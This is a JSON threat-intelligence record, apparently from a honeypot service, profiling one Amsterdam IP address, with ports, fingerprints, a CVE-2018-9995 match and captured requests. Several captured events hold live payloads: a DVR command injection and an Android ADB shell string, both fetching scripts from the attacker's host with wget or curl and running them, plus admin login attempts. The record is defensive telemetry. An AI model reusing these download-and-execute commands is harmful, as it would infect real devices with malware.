{"ip":"85.239.151.41","total_events":143,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"CDN"},"first_seen":"2026-03-26T16:25:34","last_seen":"2026-06-04T22:51:20","events_24h":9,"events_7d":87,"geo":{"country_code":"NL","country_name":"Netherlands","region":"North Holland","city":"Amsterdam","lat":52.3716,"lon":4.8883,"asn":19318,"org":"Interserver, Inc"},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as19318","label":"InterServer","category":"cdn","url":"https://www.peeringdb.com/asn/19318"},"cve_matches":[{"cve_id":"CVE-2018-9995","title":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/device.rsp"}],"top_ports":[{"port":5555,"proto":"tcp","label":"","count":49},{"port":81,"proto":"tcp","label":"","count":41},{"port":80,"proto":"tcp","label":"HTTP","count":30},{"port":85,"proto":"tcp","label":"","count":17},{"port":22,"proto":"tcp","label":"SSH","count":6}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"ja4h":["ge11nn07en_d90592efb304","po11nr10en_13fb195a63fb","ge10nn0000_000000000000","po11cn07en_c1a7b2fda835"]},"fingerprint_peers":{"ge11nn07en_d90592efb304":6,"po11cn07en_c1a7b2fda835":1,"ge10nn0000_000000000000":2896,"po11nr10en_13fb195a63fb":11},"user_agents":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36","Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0","Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0","Linux Gnu (cow)"],"timeline":[{"date":"2026-03-26","count":3},{"date":"2026-03-28","count":3},{"date":"2026-05-06","count":7},{"date":"2026-05-07","count":12},{"date":"2026-05-23","count":4},{"date":"2026-05-24","count":7},{"date":"2026-05-25","count":12},{"date":"2026-05-26","count":7},{"date":"2026-05-27","count":1},{"date":"2026-05-30","count":14},{"date":"2026-05-31","count":17},{"date":"2026-06-01","count":14},{"date":"2026-06-02","count":19},{"date":"2026-06-03","count":14},{"date":"2026-06-04","count":9}],"recent_events":[{"timestamp":"2026-06-04T22:51:20","port":80,"proto":"tcp","app_proto":"","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"connection\":\"keep-alive\",\"content-length\":\"0\",\"cookie\":\"uid=1\",\"host\":\"<HONEYPOT>:80\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F85.239.151.41%2Fthk%3B+chmod+777+thk%3B+.%2Fthk","summary":"","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"},{"timestamp":"2026-06-04T22:33:41","port":80,"proto":"tcp","app_proto":"","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"connection\":\"keep-alive\",\"content-length\":\"0\",\"cookie\":\"uid=1\",\"host\":\"<HONEYPOT>:80\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F85.239.151.41%2Fthk%3B+chmod+777+thk%3B+.%2Fthk","summary":"","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"},{"timestamp":"2026-06-04T19:05:03","port":80,"proto":"tcp","app_proto":"","host":"<HONEYPOT>","headers":"{\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\"accept-encoding\":\"gzip, deflate\",\"accept-language\":\"en-GB,en;q=0.5\",\"connection\":\"keep-alive\",\"content-length\":\"29\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:80\",\"origin\":\"http://<HONEYPOT>:80\",\"referer\":\"http://<HONEYPOT>:80/admin/login.asp\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0\"}","body":"username=admin&psd=Feefifofum\r\n\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/boaform/admin/formLogin","summary":"","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0"},{"timestamp":"2026-06-04T13:54:26","port":80,"proto":"tcp","app_proto":"","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"connection\":\"keep-alive\",\"content-length\":\"0\",\"cookie\":\"uid=1\",\"host\":\"<HONEYPOT>:80\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F85.239.151.41%2Fthk%3B+chmod+777+thk%3B+.%2Fthk","summary":"","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"},{"timestamp":"2026-06-04T09:49:48","port":80,"proto":"tcp","app_proto":"","host":"<HONEYPOT>","headers":"{\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\"accept-encoding\":\"gzip, deflate\",\"accept-language\":\"en-GB,en;q=0.5\",\"connection\":\"keep-alive\",\"content-length\":\"29\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:80\",\"origin\":\"http://<HONEYPOT>:80\",\"referer\":\"http://<HONEYPOT>:80/admin/login.asp\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0\"}","body":"username=admin&psd=Feefifofum\r\n\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/boaform/admin/formLogin","summary":"","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0"},{"timestamp":"2026-06-04T09:49:29","port":80,"proto":"tcp","app_proto":"","host":"<HONEYPOT>","headers":"{\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\"accept-encoding\":\"gzip, deflate\",\"accept-language\":\"en-GB,en;q=0.5\",\"connection\":\"keep-alive\",\"content-length\":\"29\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:80\",\"origin\":\"http://<HONEYPOT>:80\",\"referer\":\"http://<HONEYPOT>:80/admin/login.asp\",\"upgrade-insecure-requests\":\"1\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0\"}","body":"username=admin&psd=Feefifofum\r\n\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/boaform/admin/formLogin","summary":"","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0"},{"timestamp":"2026-06-04T07:41:40","port":5555,"proto":"tcp","app_proto":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000�\u0001\u0000\u0000�~\u0000\u0000����shell:>/data/local/tmp/.gtconfig && cd /data/local/tmp; >/sdcard/0/Downloads/.gtconfig && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wwg bwwg bbcl ccl; wget http://85.239.151.41/wwg; sh wwg; busybox wget http://85.239.151.41/bwwg; sh bwwg; busybox curl http://85.239.151.41/bbcl > bbcl; sh bbcl; curl http://85.239.151.41/ccl > ccl; sh ccl\u0000","method":"","user_agent":"","enriched":{"digest":"5c515c9556174df6","strings":["OPENX","shell:>/data/local/tmp/.gtconfig && cd /data/local/tmp; >/sdcard/0/Downloads/.gt…"],"iocs":{"paths":["/data/local/tmp/.gtconfig","/data/local/tmp","/sdcard/0/Downloads/.gt"]}}},{"timestamp":"2026-06-04T07:41:40","port":5555,"proto":"tcp","app_proto":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000����host::features=cmd,shell_v2","method":"","user_agent":"","enriched":{"digest":"9cb45602096504b5","strings":["CNXN","host::features=cmd,shell_v2"]}},{"timestamp":"2026-06-04T06:04:48","port":85,"proto":"tcp","app_proto":"","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"connection\":\"keep-alive\",\"content-length\":\"0\",\"cookie\":\"uid=1\",\"host\":\"<HONEYPOT>:85\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F85.239.151.41%2Fthk%3B+chmod+777+thk%3B+.%2Fthk","summary":"","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"},{"timestamp":"2026-06-03T20:14:53","port":85,"proto":"tcp","app_proto":"","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"connection\":\"keep-alive\",\"content-length\":\"0\",\"cookie\":\"uid=1\",\"host\":\"<HONEYPOT>:85\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F85.239.151.41%2Fthk%3B+chmod+777+thk%3B+.%2Fthk","summary":"","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"}],"http_methods":[{"method":"POST","count":46},{"method":"GET","count":42}],"distinct_ports_total":5,"top_paths":[{"path":"login.cgi","count":41,"ports":1},{"path":"/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F85.239.151.41%2Fthk%3B+chmod+777+thk%3B+.%2Fthk","count":23,"ports":2},{"path":"/boaform/admin/formLogin","count":22,"ports":1},{"path":"/","count":1,"ports":1},{"path":"/boafrm/formMapDelDevice","count":1,"ports":1}],"distinct_paths_total":5,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[{"username":"admin","password":"","count":22}],"header_profile":{"signature":["Accept","Accept-Encoding","Accept-Language","Connection","Content-Length","Content-Type","Host","Origin","Referer","Upgrade-Insecure-Requests","User-Agent"],"representative":[{"name":"Accept","value":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Accept-Language","value":"en-GB,en;q=0.5","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"29","notable":false},{"name":"Content-Type","value":"application/x-www-form-urlencoded","notable":true},{"name":"Host","value":"<HONEYPOT>:80","notable":false},{"name":"Origin","value":"http://<HONEYPOT>:80","notable":true},{"name":"Referer","value":"http://<HONEYPOT>:80/admin/login.asp","notable":true},{"name":"Upgrade-Insecure-Requests","value":"1","notable":false},{"name":"User-Agent","value":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0","notable":false}],"distinct_sets":2,"events_with_headers":8},"tags":[{"tag_id":"CVE-2018-9995","tag_type":"cve","title":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/device.rsp","reference_urls":["https://www.exploit-db.com/exploits/44577/","http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html","http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html","https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/","https://nvd.nist.gov/vuln/detail/CVE-2018-9995"]}],"data_as_of":"2026-06-04T22:57:57.909186+00:00"}